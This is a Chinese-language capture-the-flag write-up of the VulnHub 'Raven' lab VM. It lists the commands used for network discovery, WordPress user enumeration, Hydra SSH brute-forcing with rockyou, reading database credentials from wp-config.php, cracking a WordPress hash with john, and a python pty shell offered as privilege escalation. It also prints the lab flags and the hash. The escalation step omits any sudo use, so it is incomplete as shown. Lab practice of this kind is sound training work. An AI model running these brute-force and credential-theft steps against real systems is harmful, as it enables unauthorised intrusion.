OSCP - Raven writeup

主机来源:www.vulnhub.com

下载地址:https://download.vulnhub.com/raven/Raven.ova

用到的知识点:

wpscan漏扫

hydra暴破

john解密

python提权

发现IP

安装成功后,查找此虚拟机的IP,我使用的是netdiscover

netdiscover -i eth0 -r 10.0.3.1/24

发现IP:10.0.3.140

nmap

nmap -sV -p- 10.0.3.140

发现80端口是开的,去看一下

最终在service.html下的源代码中找到了flag1

flag1{b9bbcb33e11b80be759c4e844862482d}

 

发现页面没有什么功能之后我们扫下目录

dirb

dirb http://10.0.3.140

别的先不管,我们发现了wordpress

wpscan

那就不管三七二十一,先扫一遍再说

wpscan --url http://10.0.3.140/wordpress --wp-content-dir -ep -et -eu

找到两个用户名

尝试暴破一下,用这个字典,一般这个目录下的rockyou是压缩文件,自己解压下就好了

hydra

hydra -l michael -P rockyou.txt ssh://10.0.3.140

这里也可以-L 把这两个用户名都加进去,我这里上帝视角一下,只有michael才能暴破出来。

ssh登录一下

找到flag2

flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

然后找到/var/www/html/wordpress/wp-config.php,获得数据库账号密码

登录数据库。

在表wp_posts中获得flag3和flag4。

flag3{afc01ab56b50591e7dccf93122770cd2}
flag4{715dea6c055b9fe3337544932f2941ce}

获得了steven的密码

解一下

 $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/

用john,直接john 文件名

 然后用steven的账号登录,登录成功

可以用python提权

python -c 'import pty;pty.spawn("/bin/sh")'

 

猜你喜欢

转载自blog.csdn.net/Jiajiajiang_/article/details/105384842